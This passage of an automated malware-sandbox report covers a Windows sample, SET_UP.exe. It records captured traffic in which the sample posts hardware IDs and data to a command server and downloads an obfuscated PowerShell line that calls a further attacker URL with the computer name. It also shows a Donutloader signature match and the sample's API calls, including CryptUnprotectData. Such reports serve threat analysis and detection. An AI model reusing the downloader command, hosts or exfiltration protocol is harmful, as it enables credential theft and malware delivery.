                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                          2025-01-01 16:20:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.449740104.21.112.14431104C:\Users\user\Desktop\SET_UP.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-01 16:20:19 UTC280OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=TIHDBRMN46LBT4K4
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 20426
                                                                                                          Host: throwupset.click
                                                                                                          2025-01-01 16:20:19 UTC15331OUTData Raw: 2d 2d 54 49 48 44 42 52 4d 4e 34 36 4c 42 54 34 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 33 31 45 33 35 46 46 37 38 34 43 41 43 42 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 54 49 48 44 42 52 4d 4e 34 36 4c 42 54 34 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 49 48 44 42 52 4d 4e 34 36 4c 42 54 34 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 54
                                                                                                          Data Ascii: --TIHDBRMN46LBT4K4Content-Disposition: form-data; name="hwid"6731E35FF784CACBC2833675FF85F83D--TIHDBRMN46LBT4K4Content-Disposition: form-data; name="pid"3--TIHDBRMN46LBT4K4Content-Disposition: form-data; name="lid"hRjzG3--ELVIRA--T
                                                                                                          2025-01-01 16:20:19 UTC5095OUTData Raw: 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00
                                                                                                          Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                          2025-01-01 16:20:20 UTC1125INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 01 Jan 2025 16:20:20 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=oqtofhs406jl2l4k17gin92h5i; expires=Sun, 27 Apr 2025 10:06:58 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DXt1%2B%2BMQDHzUCFjE8hBMXSKAXnf2Kd1U7tGMDYtIZXC7q7w5ZWgXpPKusUCtAC33ouknpWQzzePIvOmiWgkMyIbGu7DM%2BPSVN1BkDSkekrH0RQfgIJHY0X3bQkRKL6E6Yiuz"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fb3d606997bc34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1595&rtt_var=603&sent=12&recv=24&lost=0&retrans=0&sent_bytes=3051&recv_bytes=21386&delivery_rate=2746081&cwnd=182&unsent_bytes=0&cid=cc8ecaa4959b7f30&ts=645&x=0"
                                                                                                          2025-01-01 16:20:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                          2025-01-01 16:20:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.449742104.21.112.14431104C:\Users\user\Desktop\SET_UP.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-01 16:20:21 UTC277OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=9T4TJE2W4EL50Q
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 1252
                                                                                                          Host: throwupset.click
                                                                                                          2025-01-01 16:20:21 UTC1252OUTData Raw: 2d 2d 39 54 34 54 4a 45 32 57 34 45 4c 35 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 33 31 45 33 35 46 46 37 38 34 43 41 43 42 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 39 54 34 54 4a 45 32 57 34 45 4c 35 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 54 34 54 4a 45 32 57 34 45 4c 35 30 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 39 54 34 54 4a 45 32
                                                                                                          Data Ascii: --9T4TJE2W4EL50QContent-Disposition: form-data; name="hwid"6731E35FF784CACBC2833675FF85F83D--9T4TJE2W4EL50QContent-Disposition: form-data; name="pid"1--9T4TJE2W4EL50QContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--9T4TJE2
                                                                                                          2025-01-01 16:20:21 UTC1122INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 01 Jan 2025 16:20:21 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=ddrfdtbblbr0phnclcr4q35ak5; expires=Sun, 27 Apr 2025 10:07:00 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jkA2KsKv3wQr1QLRc3Ol%2F4Gj9gUXTNGjgqtuU8SIt3cC68R2hSDYhpHhpDbxAue%2FVxH6U90aICZDhtciDZRM%2FyRIHsrKtAkbvdeA87KTWpbx8QVAHncCIhQTQnS61Ost3trr"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fb3d60fbace0f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1617&rtt_var=618&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3051&recv_bytes=2165&delivery_rate=2630630&cwnd=222&unsent_bytes=0&cid=e188a2f01bdcc08c&ts=445&x=0"
                                                                                                          2025-01-01 16:20:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                          2025-01-01 16:20:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.449743104.21.112.14431104C:\Users\user\Desktop\SET_UP.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-01 16:20:22 UTC279OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: multipart/form-data; boundary=C2VKRIWGTSFJE8RT
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 1092
                                                                                                          Host: throwupset.click
                                                                                                          2025-01-01 16:20:22 UTC1092OUTData Raw: 2d 2d 43 32 56 4b 52 49 57 47 54 53 46 4a 45 38 52 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 37 33 31 45 33 35 46 46 37 38 34 43 41 43 42 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44 0d 0a 2d 2d 43 32 56 4b 52 49 57 47 54 53 46 4a 45 38 52 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 43 32 56 4b 52 49 57 47 54 53 46 4a 45 38 52 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 43
                                                                                                          Data Ascii: --C2VKRIWGTSFJE8RTContent-Disposition: form-data; name="hwid"6731E35FF784CACBC2833675FF85F83D--C2VKRIWGTSFJE8RTContent-Disposition: form-data; name="pid"1--C2VKRIWGTSFJE8RTContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--C
                                                                                                          2025-01-01 16:20:22 UTC1126INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 01 Jan 2025 16:20:22 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=lp7evbjmvv30p0prab5lt7vdil; expires=Sun, 27 Apr 2025 10:07:01 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ok1MX849J64nl9OGXliuiwhl5AUG%2B2gnj4RJuwYRlk82GgcfT%2BZXmyM5%2BRy2HDmq9rYiCceepCELClU7NxO5FrAddX%2F%2BWf1KKgSHILtdMOJEUz8jJQuG2b9wpvJat2xrdvaW"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fb3d6160d88727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1966&min_rtt=1953&rtt_var=741&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3051&recv_bytes=2007&delivery_rate=2242703&cwnd=233&unsent_bytes=0&cid=b684824853d0722b&ts=471&x=0"
                                                                                                          2025-01-01 16:20:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                          2025-01-01 16:20:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449744104.21.112.14431104C:\Users\user\Desktop\SET_UP.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-01 16:20:22 UTC265OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 115
                                                                                                          Host: throwupset.click
                                                                                                          2025-01-01 16:20:22 UTC115OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 36 37 33 31 45 33 35 46 46 37 38 34 43 41 43 42 43 32 38 33 33 36 37 35 46 46 38 35 46 38 33 44
                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=6731E35FF784CACBC2833675FF85F83D
                                                                                                          2025-01-01 16:20:23 UTC1128INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 01 Jan 2025 16:20:23 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=eg6vsetcuuflcctnje1b6jsutp; expires=Sun, 27 Apr 2025 10:07:02 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          X-Frame-Options: DENY
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          vary: accept-encoding
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T8d00fBdPUf0RDu9%2BTm%2F7GMSmQuhTwVWB7DNDNZtq5udcgb4%2FtPx5maZwyGO1hQwp26mza4cBl9mizBKVkrGbS8%2Fcllnj3FC%2BdZOgZSnrgO4Xx8zaIrnQlanYS%2BABk08usGQ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fb3d61c1aad0f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1688&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3050&recv_bytes=1016&delivery_rate=2555425&cwnd=222&unsent_bytes=0&cid=a93483fc785fd6aa&ts=736&x=0"
                                                                                                          2025-01-01 16:20:23 UTC218INData Raw: 64 34 0d 0a 4a 73 68 43 46 6a 6e 6d 63 50 35 35 64 53 62 7a 39 36 72 79 4d 44 43 64 30 6f 6d 6d 32 34 59 32 33 62 32 2b 5a 33 68 79 71 30 6c 39 73 32 42 6a 47 39 78 53 6c 67 30 42 56 6f 44 4e 39 74 31 73 48 2f 36 33 37 74 50 31 39 56 36 79 7a 65 4a 49 51 45 65 63 66 52 54 2b 63 43 49 4e 30 43 7a 52 43 52 30 49 68 34 2f 65 30 42 77 53 2b 36 61 72 6e 4f 6d 71 46 4c 69 66 68 46 59 46 58 74 42 72 55 2b 70 34 4e 46 47 53 42 49 34 4b 54 33 72 63 71 34 57 5a 58 46 6e 74 70 50 7a 4c 73 76 56 44 74 4a 50 4e 44 78 63 43 39 32 5a 50 70 6a 5a 4a 57 6f 6f 41 6f 51 6f 64 52 39 32 44 30 6f 59 53 48 4c 2b 30 2f 59 54 68 74 68 72 2f 32 4a 78 64 53 41 2f 32 0d 0a
                                                                                                          Data Ascii: d4JshCFjnmcP55dSbz96ryMDCd0omm24Y23b2+Z3hyq0l9s2BjG9xSlg0BVoDN9t1sH/637tP19V6yzeJIQEecfRT+cCIN0CzRCR0Ih4/e0BwS+6arnOmqFLifhFYFXtBrU+p4NFGSBI4KT3rcq4WZXFntpPzLsvVDtJPNDxcC92ZPpjZJWooAoQodR92D0oYSHL+0/YThthr/2JxdSA/2
                                                                                                          2025-01-01 16:20:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.449745185.161.251.214431104C:\Users\user\Desktop\SET_UP.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-01 16:20:24 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Host: cegu.shop
                                                                                                          2025-01-01 16:20:24 UTC249INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.26.2
                                                                                                          Date: Wed, 01 Jan 2025 16:20:24 GMT
                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                          Content-Length: 329
                                                                                                          Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                          Connection: close
                                                                                                          ETag: "676c9e2a-149"
                                                                                                          Accept-Ranges: bytes
                                                                                                          2025-01-01 16:20:24 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                          Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Target ID:0
                                                                                                          Start time:11:20:02
                                                                                                          Start date:01/01/2025
                                                                                                          Path:C:\Users\user\Desktop\SET_UP.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\SET_UP.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:75'933'817 bytes
                                                                                                          MD5 hash:C58FA8B1892D11FCCE2893E637734A00
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Yara matches:
                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:5.7%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:53.7%
                                                                                                            Total number of Nodes:246
                                                                                                            Total number of Limit Nodes:34
                                                                                                            execution_graph 24824 2dbd8df 24829 2dc12c0 24824->24829 24826 2dbd8e5 24827 2dc12c0 LdrInitializeThunk 24826->24827 24828 2dbd906 24827->24828 24834 2dc12d9 24829->24834 24830 2dc12e0 24830->24826 24831 2decae0 LdrInitializeThunk 24831->24834 24834->24830 24834->24831 24835 2defad0 LdrInitializeThunk 24834->24835 24836 2df0350 LdrInitializeThunk 24834->24836 24835->24834 24836->24834 24837 2de145b 24840 2dc3830 24837->24840 24839 2de1460 CoSetProxyBlanket 24840->24839 25070 2ddcd98 25071 2ddcda4 GetComputerNameExA 25070->25071 25073 2de6e16 25074 2de6e3d 25073->25074 25076 2de6e66 25074->25076 25077 2decae0 LdrInitializeThunk 25074->25077 25077->25074 25078 2dbfd12 25081 2dbfd2c 25078->25081 25079 2dbe250 25081->25079 25082 2dc43d0 25081->25082 25083 2dc43f0 25082->25083 25083->25083 25084 2defcb0 LdrInitializeThunk 25083->25084 25085 2dc4513 25084->25085 24841 2dd1150 24853 2defcb0 24841->24853 24843 2dd1893 24844 2dd1193 24844->24843 24857 2deae90 24844->24857 24846 2dd11ec 24852 2dd1256 24846->24852 24860 2decae0 LdrInitializeThunk 24846->24860 24848 2deae90 RtlAllocateHeap 24848->24852 24850 2dd181b 24850->24843 24862 2decae0 LdrInitializeThunk 24850->24862 24852->24848 24852->24850 24861 2decae0 LdrInitializeThunk 24852->24861 24854 2defcd0 24853->24854 24854->24854 24855 2defe3e 24854->24855 24863 2decae0 LdrInitializeThunk 24854->24863 24855->24844 24864 2dee180 24857->24864 24859 2deae9a RtlAllocateHeap 24859->24846 24860->24846 24861->24852 24862->24850 24863->24855 24865 2dee190 24864->24865 24865->24859 24865->24865 24866 2dbd3cb 24867 2dbd3d1 24866->24867 24868 2dbd3e0 CoUninitialize 24867->24868 24869 2dbd400 24868->24869 24870 2dd3148 24871 2dd3169 24870->24871 24871->24871 24875 2defe90 24871->24875 24873 2dd3231 24874 2defe90 LdrInitializeThunk 24873->24874 24874->24873 24876 2defeb0 24875->24876 24877 2df001e 24876->24877 24879 2decae0 LdrInitializeThunk 24876->24879 24877->24873 24879->24877 25096 2dbcc83 25098 2dbcd10 25096->25098 25097 2dbcd5e 25098->25097 25100 2decae0 LdrInitializeThunk 25098->25100 25100->25097 24880 2deaec5 24881 2dee180 24880->24881 24882 2deaeca RtlFreeHeap 24881->24882 24883 2ddccc6 24884 2ddccd6 24883->24884 24885 2ddcd5b GetComputerNameExA 24884->24885 25101 2dc4bbf 25102 2dc4bd0 25101->25102 25103 2dc4c76 CryptUnprotectData 25102->25103 25104 2dde6b6 CoSetProxyBlanket 24886 2dc8870 24887 2dc887b 24886->24887 24888 2defe90 LdrInitializeThunk 24887->24888 24889 2dc8af7 24888->24889 24890 2ddc3f3 24892 2ddc410 24890->24892 24891 2ddc864 GetPhysicallyInstalledSystemMemory 24891->24892 24892->24891 24893 2deec70 24894 2deec90 24893->24894 24895 2deed1e 24894->24895 24901 2decae0 LdrInitializeThunk 24894->24901 24896 2deae90 RtlAllocateHeap 24895->24896 24900 2deee2e 24895->24900 24898 2deed86 24896->24898 24898->24900 24902 2decae0 LdrInitializeThunk 24898->24902 24901->24895 24902->24900 24903 2df0170 24905 2df0190 24903->24905 24904 2df02fe 24907 2df021e 24905->24907 24909 2decae0 LdrInitializeThunk 24905->24909 24907->24904 24910 2decae0 LdrInitializeThunk 24907->24910 24909->24907 24910->24904 25105 2dbc523 CoInitializeSecurity 25106 2dbd1a0 25107 2dbd1b0 25106->25107 25110 2dbd1fe 25107->25110 25124 2decae0 LdrInitializeThunk 25107->25124 25108 2dbd2ae 25120 2dd3970 25108->25120 25110->25108 25125 2decae0 LdrInitializeThunk 25110->25125 25113 2dbd32d 25114 2dd5ca0 RtlAllocateHeap LdrInitializeThunk 25113->25114 25115 2dbd356 25114->25115 25116 2dd6060 RtlAllocateHeap LdrInitializeThunk 25115->25116 25117 2dbd35f 25116->25117 25118 2de2bb0 6 API calls 25117->25118 25119 2dbd3b1 25118->25119 25121 2dd397e 25120->25121 25126 2deeb10 25121->25126 25124->25110 25125->25108 25128 2deeb30 25126->25128 25127 2dd3a17 25128->25127 25130 2decae0 LdrInitializeThunk 25128->25130 25130->25127 24916 2dbc9e6 24917 2dbca00 24916->24917 24920 2de7ca0 24917->24920 24919 2dbcb32 24919->24919 24921 2de7cd0 CoCreateInstance 24920->24921 24923 2de843b 24921->24923 24924 2de7ed2 SysAllocString 24921->24924 24925 2de844b GetVolumeInformationW 24923->24925 24927 2de7f9b 24924->24927 24934 2de8469 24925->24934 24928 2de842a SysFreeString 24927->24928 24929 2de7faa CoSetProxyBlanket 24927->24929 24928->24923 24930 2de7fca SysAllocString 24929->24930 24935 2de8400 24929->24935 24932 2de80a0 24930->24932 24932->24932 24933 2de80da SysAllocString 24932->24933 24936 2de8101 24933->24936 24934->24919 24935->24928 24936->24935 24937 2de8145 VariantInit 24936->24937 24939 2de8190 24937->24939 24938 2de83ef VariantClear 24938->24935 24939->24938 25131 2dd0ca0 25132 2dd0d00 25131->25132 25133 2dd0cae 25131->25133 25137 2dd0dc0 25133->25137 25138 2dd0dd0 25137->25138 25138->25138 25139 2defe90 LdrInitializeThunk 25138->25139 25140 2dd0eef 25139->25140 24940 2de7ae0 24942 2de7af0 24940->24942 24941 2de7c3e 24944 2de7b5e 24942->24944 24949 2decae0 LdrInitializeThunk 24942->24949 24944->24941 24946 2de7bde 24944->24946 24948 2decae0 LdrInitializeThunk 24944->24948 24946->24941 24950 2decae0 LdrInitializeThunk 24946->24950 24948->24946 24949->24944 24950->24941 24951 24d03f3 24952 24d0401 24951->24952 24965 24d0d43 24952->24965 24954 24d0599 GetPEB 24956 24d0616 24954->24956 24955 24d0554 24955->24954 24964 24d0887 24955->24964 24968 24d0b03 24956->24968 24959 24d0677 CreateThread 24960 24d064f 24959->24960 24979 24d09b3 GetPEB 24959->24979 24960->24964 24976 24d1003 GetPEB 24960->24976 24962 24d06d1 24963 24d0b03 4 API calls 24962->24963 24962->24964 24963->24964 24977 24d0d63 GetPEB 24965->24977 24967 24d0d50 24967->24955 24969 24d0b19 CreateToolhelp32Snapshot 24968->24969 24971 24d0649 24969->24971 24972 24d0b50 Thread32First 24969->24972 24971->24959 24971->24960 24972->24971 24973 24d0b77 24972->24973 24973->24971 24974 24d0bae Wow64SuspendThread 24973->24974 24975 24d0bd8 CloseHandle 24973->24975 24974->24975 24975->24973 24976->24962 24978 24d0d7e 24977->24978 24978->24967 24982 24d0a0c 24979->24982 24980 24d0a6c CreateThread 24980->24982 24983 24d11e3 24980->24983 24981 24d0ab9 24982->24980 24982->24981 24986 251cfa8 24983->24986 24987 251d0b7 24986->24987 24988 251cfcd 24986->24988 24998 251e283 24987->24998 25019 251f82a 24988->25019 24991 251cfe5 24992 251f82a LoadLibraryA 24991->24992 24997 24d11e8 24991->24997 24993 251d027 24992->24993 24994 251f82a LoadLibraryA 24993->24994 24995 251d043 24994->24995 24996 251f82a LoadLibraryA 24995->24996 24996->24997 24999 251f82a 